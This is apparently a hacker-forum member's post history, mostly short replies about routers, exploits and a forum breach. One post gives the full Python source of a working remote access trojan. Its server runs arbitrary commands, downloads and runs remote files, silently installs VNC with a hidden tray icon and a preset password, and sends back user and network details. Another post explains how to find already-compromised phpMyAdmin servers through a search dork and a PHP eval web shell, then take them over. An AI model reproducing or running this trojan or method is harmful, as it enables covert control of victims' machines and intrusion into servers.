DingleBerries
Dedicated Members-
Posts
1,291 -
kajiji started following DingleBerries
-
Why not try the httpd exploit for dd-wrt? I don't know if it will work, but it is worth a try.
-
OpenSSH <= 5.2 zero day exploit code - 48hrs until it is publicly released?
DingleBerries replied to foo's topic in Security
There are going to be a bunch more "0-days" over the next few months that are going to be bogus. Some of them now are nothing but malware. Be wary of what you run. -
I wish hak5 had down vote buttons.
-
source code?
-
Here is a RAT i have been working on in python. Its not done. Download Terry the Trojan and use that as the client to send/recieve data. from Tkinter import * from tkMessageBox import * from ScrolledText import * import socket import sys portvar = 2727 try: if sys.argv[1] == "/port": try: portvar = int(sys.argv[2]) except: portvar = 2727 except: portvar = 2727 def std(string): stdbox.config(state=NORMAL) stdbox.insert(END,"" + string + "\n") stdbox.config(state=DISABLED) def cnnect(var="poo"): sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) success = 1 try: sockt.connect((ipbox.get(),portvar)) except: success = 0 std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.") if success == 1: sockt.send(cmdbox.get()) retdata = sockt.recv(2048) std(retdata) root = Tk() root.title("Terry the Trojan") #FRAMES ipfrm = Frame(root) ipfrm.pack() cmdfrm = Frame(root) cmdfrm.pack() stdfrm = Frame(root) stdfrm.pack() #IP/Port Entry Widgets Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1) ipbox = Entry(ipfrm,width=50) ipbox.grid(row=1,column=2) #Returned output widgets stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000") stdbox.grid(row=1,column=1) #Command sending widgets cmdbox = Entry(cmdfrm,width=50) cmdbox.grid(row=1,column=1) Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2) cmdbox.bind("<Return>",cnnect) root.mainloop() HAH shit wrong code. Ill post it in a min. OK HERE is the RAT, sorry about that. You should be able to tell what the commands do. 
import socket,os,sys,urllib,re,ftplib from time import sleep port = 2727 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sockt.bind(('',port)) sockt.listen(1) while True: channel, details = sockt.accept() command = channel.recv(2048) if command == "kill": channel.send("Server trojan has been closed.") sys.exit() elif command == "ip": connect = s.connect(("www.whatismyipaddress.com", 80)) s.send('GET / HTTP/1.0\n\n') socketlines = s.recv(2048) lines = socketlines.split() ip = lines[len(lines) - 1] channel.send(ip) elif command == "whoami": channel.send(os.environ["USERNAME"]) elif command == "drive": channel.send(os.environ["HOMEDRIVE"]) elif command == "userfolder": channel.send(os.environ["HOMEPATH"]) elif command == "installvnc": urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe') fs=os.popen3('update.exe /sp- /verysilent','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(1) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(0.2) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(0.5) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(0.3) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(1) fs=os.popen3('net start "VNC Server"','b') fs=os.popen3('del update.exe','b') channel.send("VNC was installed, password is vncserv.") elif command == "netstat": fs=os.popen3('netstat -ano>windsys.ini','b') sleep(2) f = open('windsys.ini') channel.send(f.read()) f.close() elif command == "whereami": channel.send(os.getcwd()) elif command.startswith("download "): file = command.replace("download ", "") 
urllib.urlretrieve(file,"file.exe") channel.send("File downloaded. Saved as 'file.exe', rename extension") else: csuc = 1 try: fs=os.popen3(command,'b') except: csuc = 0 if csuc == 1: channel.send("Command Sucessful") else: channel.send("Command Failed") channel.close()
-
Too much processing power. You will need a big ass router.
-
Mine was 1<3m4|\|U3)
-
The pwnies being the pwned?
-
If you could get Airpwn running on a fon or other FOSS router then I think that would be more than enough.
-
The server hosting Hak5.org and the Hak5 forums was hacked.
DingleBerries replied to VaKo's topic in Everything Else
I haven't played around with phpBB, but I know other forums that send you a reset link. If anything I'd expected to receive a temporary password and be asked to change it. I just hope that the password I am sent is hashed in the db after it has been sent to me. Just saw your post, VaKo. Glad they were hashed. Good luck BFing the good ones. -
Python can do that with ease. This code does it for Google Groups but can be easily modified to fit your needs.
-
Darren has the compiled version of it on his site, link. I also have the AESkey find compiled if anyone needs that.
-
My favorite way is to use the "Welcome to phpMyAdmin" AND " Create new database" dork and find databases that have already been popped. Look for <?php eval($_POST[cmd]);?> and try to find the page where you send commands. That or root the box yourself from there.
-
The server hosting Hak5.org and the Hak5 forums was hacked.
DingleBerries replied to VaKo's topic in Everything Else
Why am I being emailed a plain text password when I try to recover my account? I know that I should change it but I am not sure if others are sure about what to do. -
http://twitter.com/hak5darren/status/1664879332 If you haven't solved it, don't try to help with it.